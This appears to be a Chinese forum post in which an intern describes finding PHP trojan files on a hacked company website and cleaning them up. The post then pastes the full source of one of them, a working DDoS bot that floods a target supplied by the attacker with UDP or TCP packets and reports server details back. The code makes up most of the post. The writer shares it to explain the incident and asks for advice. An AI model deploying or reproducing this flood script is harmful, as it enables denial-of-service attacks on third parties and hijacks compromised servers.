近期找了个网站方面的实习,刚上班没几天发现公司网站被黑,网站文件夹里多了几个php文件。打开其中一个一看,一头雾水,由于是新人头一次遭遇,无奈百度之。最后经过各种努力,终于知道了是大概干什么的了。其实只是把我公司的网站当成代理,发送大量的数据包,用来攻击其他人,同时也造成我公司网站异常。最后我的解决办法是删除木马,更改密码,最后打上漏洞补丁。下面我贴出代码,希望不要成为别人的工具。希望各位大牛多多指教我这个新人。
<?php set_time_limit(86400); ignore_user_abort(True); $packets = 0; $http = $_REQUEST['http']; $rand = $_REQUEST['exit']; $exec_time = $_REQUEST['time']; if (StrLen($http)==0 or StrLen($rand)==0 or StrLen($exec_time)==0) { if(StrLen($_REQUEST['rat'])<>0) { echo $_REQUEST['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_REQUEST['rat']; exit; } echo "Php 2012 Terminator "; echo $_REQUEST['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_REQUEST['rat']"; exit; } for($i=0;$i<65535;$i++) { $out .= "X"; } //Udp1-fsockopen Udp2 pfsockopen Tcp3 CC.center $max_time = time()+$exec_time; if($rand==53) while(1) { $packets++; if(time() > $max_time) { break; } $fp = fsockopen("udp://$http", $rand, $errno, $errstr, 5); if($fp) { fwrite($fp, $out); fclose($fp); } } else if($rand==500) while(1) { $packets++; if(time() > $max_time){ break; } $fp = pfsockopen("udp://$http", $rand, $errno, $errstr, 5); if($fp) { fwrite($fp, $out); fclose($fp); } } else while(1) { $packets++; if(time() > $max_time){ break; } $fp = pfsockopen("tcp://$http", $rand, $errno, $errstr, 5); if($fp) { fwrite($fp, $out); fclose($fp); } } ?>